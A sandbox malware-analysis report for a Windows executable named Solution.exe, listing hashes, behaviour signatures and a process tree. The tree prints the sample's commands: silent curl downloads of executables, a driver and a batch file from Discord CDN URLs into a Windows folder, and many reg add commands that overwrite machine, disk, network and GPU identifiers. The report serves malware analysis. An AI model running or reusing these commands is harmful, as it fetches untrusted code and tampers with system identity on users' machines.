240a23bb8d3fc3329aa12516ece17d754bc5d1803092a3a3344f212d3c59df94

Resubmissions

20/12/2023, 11:12

231220-nbbrdsgaa4 8

20/12/2023, 11:08

231220-m817wafge3 8

20/12/2023, 11:05

231220-m68h6sfeg8 8

Analysis

max time kernel
10s
max time network
1340s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
20/12/2023, 11:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Solution.exe
Size

87KB
MD5

7bf1f379b20a36a53ec1ab3a1074f9e7
SHA1

c4cc98efdc6f7c470420455471506bd20a2ea01a
SHA256

240a23bb8d3fc3329aa12516ece17d754bc5d1803092a3a3344f212d3c59df94
SHA512

a0a209d50482386c382ed57246095ee2899343bf07ea7ea0cd4bba2578b37c4790f5369874f0cd6221c77652d06b74056d7d9dd77a98a655fcc99285d6bda251
SSDEEP

768:/AVldmeYxW0ofoAS4djhj7EvFZwS/TIdLjI7PFtq6K9Up5CGxkD7cVFsEd:/zeSbDg+bhTIdLjwPFtbK9qoykKdd

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Drops file in Windows directory 15 IoCs

description	ioc	Process
File created	C:\Windows\GameBarPresenceWriter\Solution.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Mac.bat	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Solution.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Solution64.sys	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Disk2.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Mac.bat	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Solution64.sys	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Disk2.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Disk1.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Solution64.sys	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Disk1.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Disk2.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Mac.bat	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Solution.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Disk1.exe	curl.exe

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe

Enumerates system info in registry 2 TTPs 18 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "293627589-357428535-2502731715"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "293627589-357428535-2502731715"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "293627589-357428535-2502731715"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "293627589-357428535-2502731715"	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "293627589-357428535-2502731715"	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "293627589-357428535-2502731715"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
3592	reg.exe
3292	reg.exe
4300	reg.exe
5020	reg.exe
2308	reg.exe
2192	reg.exe
4896	reg.exe
4368	reg.exe
3492	reg.exe
4536	reg.exe
688	reg.exe
2196	reg.exe
2936	reg.exe
712	reg.exe
1404	reg.exe
1164	reg.exe
524	reg.exe
1404	reg.exe
1620	reg.exe
4368	reg.exe
2780	reg.exe
3292	reg.exe
460	reg.exe
4452	reg.exe
3292	reg.exe
5116	reg.exe
2684	reg.exe
2028	reg.exe
2408	reg.exe
3152	reg.exe
1984	reg.exe
3492	reg.exe
1872	reg.exe
712	reg.exe
2336	reg.exe
3224	reg.exe
1884	reg.exe
2200	reg.exe
2256	reg.exe
4744	reg.exe
1404	reg.exe
1560	reg.exe
2196	reg.exe
2208	reg.exe
524	reg.exe
3224	reg.exe
4292	reg.exe
1984	reg.exe
1560	reg.exe
688	reg.exe
4640	reg.exe
4048	reg.exe
3592	reg.exe
2192	reg.exe
3552	reg.exe
1872	reg.exe
2408	reg.exe
3224	reg.exe
4536	reg.exe
2572	reg.exe
2256	reg.exe
460	reg.exe
2208	reg.exe
2028	reg.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1500	WMIC.exe
Token: SeSecurityPrivilege	1500	WMIC.exe
Token: SeTakeOwnershipPrivilege	1500	WMIC.exe
Token: SeLoadDriverPrivilege	1500	WMIC.exe
Token: SeSystemProfilePrivilege	1500	WMIC.exe
Token: SeSystemtimePrivilege	1500	WMIC.exe
Token: SeProfSingleProcessPrivilege	1500	WMIC.exe
Token: SeIncBasePriorityPrivilege	1500	WMIC.exe
Token: SeCreatePagefilePrivilege	1500	WMIC.exe
Token: SeBackupPrivilege	1500	WMIC.exe
Token: SeRestorePrivilege	1500	WMIC.exe
Token: SeShutdownPrivilege	1500	WMIC.exe
Token: SeDebugPrivilege	1500	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1500	WMIC.exe
Token: SeRemoteShutdownPrivilege	1500	WMIC.exe
Token: SeUndockPrivilege	1500	WMIC.exe
Token: SeManageVolumePrivilege	1500	WMIC.exe
Token: 33	1500	WMIC.exe
Token: 34	1500	WMIC.exe
Token: 35	1500	WMIC.exe
Token: 36	1500	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1500	WMIC.exe
Token: SeSecurityPrivilege	1500	WMIC.exe
Token: SeTakeOwnershipPrivilege	1500	WMIC.exe
Token: SeLoadDriverPrivilege	1500	WMIC.exe
Token: SeSystemProfilePrivilege	1500	WMIC.exe
Token: SeSystemtimePrivilege	1500	WMIC.exe
Token: SeProfSingleProcessPrivilege	1500	WMIC.exe
Token: SeIncBasePriorityPrivilege	1500	WMIC.exe
Token: SeCreatePagefilePrivilege	1500	WMIC.exe
Token: SeBackupPrivilege	1500	WMIC.exe
Token: SeRestorePrivilege	1500	WMIC.exe
Token: SeShutdownPrivilege	1500	WMIC.exe
Token: SeDebugPrivilege	1500	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1500	WMIC.exe
Token: SeRemoteShutdownPrivilege	1500	WMIC.exe
Token: SeUndockPrivilege	1500	WMIC.exe
Token: SeManageVolumePrivilege	1500	WMIC.exe
Token: 33	1500	WMIC.exe
Token: 34	1500	WMIC.exe
Token: 35	1500	WMIC.exe
Token: 36	1500	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1204	WMIC.exe
Token: SeSecurityPrivilege	1204	WMIC.exe
Token: SeTakeOwnershipPrivilege	1204	WMIC.exe
Token: SeLoadDriverPrivilege	1204	WMIC.exe
Token: SeSystemProfilePrivilege	1204	WMIC.exe
Token: SeSystemtimePrivilege	1204	WMIC.exe
Token: SeProfSingleProcessPrivilege	1204	WMIC.exe
Token: SeIncBasePriorityPrivilege	1204	WMIC.exe
Token: SeCreatePagefilePrivilege	1204	WMIC.exe
Token: SeBackupPrivilege	1204	WMIC.exe
Token: SeRestorePrivilege	1204	WMIC.exe
Token: SeShutdownPrivilege	1204	WMIC.exe
Token: SeDebugPrivilege	1204	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1204	WMIC.exe
Token: SeRemoteShutdownPrivilege	1204	WMIC.exe
Token: SeUndockPrivilege	1204	WMIC.exe
Token: SeManageVolumePrivilege	1204	WMIC.exe
Token: 33	1204	WMIC.exe
Token: 34	1204	WMIC.exe
Token: 35	1204	WMIC.exe
Token: 36	1204	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1204	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1556 wrote to memory of 3000	1556	Solution.exe	91
PID 1556 wrote to memory of 3000	1556	Solution.exe	91
PID 1556 wrote to memory of 3664	1556	Solution.exe	92
PID 1556 wrote to memory of 3664	1556	Solution.exe	92
PID 1556 wrote to memory of 1404	1556	Solution.exe	99
PID 1556 wrote to memory of 1404	1556	Solution.exe	99
PID 1404 wrote to memory of 2360	1404	cmd.exe	100
PID 1404 wrote to memory of 2360	1404	cmd.exe	100
PID 1556 wrote to memory of 3128	1556	Solution.exe	101
PID 1556 wrote to memory of 3128	1556	Solution.exe	101
PID 3128 wrote to memory of 3784	3128	cmd.exe	102
PID 3128 wrote to memory of 3784	3128	cmd.exe	102
PID 1556 wrote to memory of 4732	1556	Solution.exe	103
PID 1556 wrote to memory of 4732	1556	Solution.exe	103
PID 4732 wrote to memory of 1664	4732	cmd.exe	104
PID 4732 wrote to memory of 1664	4732	cmd.exe	104
PID 1556 wrote to memory of 4180	1556	Solution.exe	105
PID 1556 wrote to memory of 4180	1556	Solution.exe	105
PID 4180 wrote to memory of 5000	4180	cmd.exe	106
PID 4180 wrote to memory of 5000	4180	cmd.exe	106
PID 1556 wrote to memory of 2656	1556	Solution.exe	107
PID 1556 wrote to memory of 2656	1556	Solution.exe	107
PID 2656 wrote to memory of 3688	2656	cmd.exe	108
PID 2656 wrote to memory of 3688	2656	cmd.exe	108
PID 1556 wrote to memory of 4024	1556	Solution.exe	110
PID 1556 wrote to memory of 4024	1556	Solution.exe	110
PID 4024 wrote to memory of 4536	4024	cmd.exe	111
PID 4024 wrote to memory of 4536	4024	cmd.exe	111
PID 1556 wrote to memory of 3648	1556	Solution.exe	112
PID 1556 wrote to memory of 3648	1556	Solution.exe	112
PID 3648 wrote to memory of 2700	3648	cmd.exe	113
PID 3648 wrote to memory of 2700	3648	cmd.exe	113
PID 1556 wrote to memory of 3336	1556	Solution.exe	114
PID 1556 wrote to memory of 3336	1556	Solution.exe	114
PID 3336 wrote to memory of 4048	3336	cmd.exe	115
PID 3336 wrote to memory of 4048	3336	cmd.exe	115
PID 1556 wrote to memory of 2244	1556	Solution.exe	116
PID 1556 wrote to memory of 2244	1556	Solution.exe	116
PID 2244 wrote to memory of 5020	2244	cmd.exe	117
PID 2244 wrote to memory of 5020	2244	cmd.exe	117
PID 1556 wrote to memory of 3028	1556	Solution.exe	118
PID 1556 wrote to memory of 3028	1556	Solution.exe	118
PID 3028 wrote to memory of 2676	3028	cmd.exe	119
PID 3028 wrote to memory of 2676	3028	cmd.exe	119
PID 1556 wrote to memory of 1360	1556	Solution.exe	120
PID 1556 wrote to memory of 1360	1556	Solution.exe	120
PID 1360 wrote to memory of 1164	1360	cmd.exe	121
PID 1360 wrote to memory of 1164	1360	cmd.exe	121
PID 1556 wrote to memory of 776	1556	Solution.exe	122
PID 1556 wrote to memory of 776	1556	Solution.exe	122
PID 776 wrote to memory of 3492	776	cmd.exe	123
PID 776 wrote to memory of 3492	776	cmd.exe	123
PID 1556 wrote to memory of 2680	1556	Solution.exe	124
PID 1556 wrote to memory of 2680	1556	Solution.exe	124
PID 2680 wrote to memory of 2208	2680	cmd.exe	125
PID 2680 wrote to memory of 2208	2680	cmd.exe	125
PID 1556 wrote to memory of 1112	1556	Solution.exe	126
PID 1556 wrote to memory of 1112	1556	Solution.exe	126
PID 1112 wrote to memory of 2196	1112	cmd.exe	127
PID 1112 wrote to memory of 2196	1112	cmd.exe	127
PID 1556 wrote to memory of 5068	1556	Solution.exe	128
PID 1556 wrote to memory of 5068	1556	Solution.exe	128
PID 5068 wrote to memory of 4896	5068	cmd.exe	129
PID 5068 wrote to memory of 4896	5068	cmd.exe	129

C:\Users\Admin\AppData\Local\Temp\Solution.exe
"C:\Users\Admin\AppData\Local\Temp\Solution.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color f
  2⤵
  PID:3000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c pause >nul
  2⤵
  PID:3664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556901333475459/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1404
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556901333475459/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe
    3⤵
    - Drops file in Windows directory
    PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556912746188840/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3128
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556912746188840/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys
    3⤵
    - Drops file in Windows directory
    PID:3784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556924335034541/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4732
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556924335034541/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe
    3⤵
    - Drops file in Windows directory
    PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556933348597870/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4180
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556933348597870/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe
    3⤵
    - Drops file in Windows directory
    PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556940990627880/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2656
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556940990627880/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat
    3⤵
    - Drops file in Windows directory
    PID:3688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4024
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 29359 /f
    3⤵
    - Modifies registry key
    PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3648
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 29359 /f
    3⤵
    PID:2700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3336
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {2935929608-184784472-1471327788} /f
    3⤵
    PID:4048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2244
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3028
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {2935929608-184784472-1471327788} /f
    3⤵
    PID:2676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1360
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {2935929608-184784472-1471327788} /f
    3⤵
    PID:1164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:776
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:3492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2680
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:2208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1112
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:2196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5068
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:4896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2668
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:2256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2132
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:4368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:460
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:2336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:5052
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:1884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2264
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:3592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:536
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:3352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2236
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:2636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2368
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Enumerates system info in registry
    - Modifies registry key
    PID:3552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:852
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Enumerates system info in registry
    PID:2936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3836
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {293627589-357428535-2502731715} /f
    3⤵
    PID:524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4088
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:2028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3508
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:4744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3004
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:2780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3024
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:1872
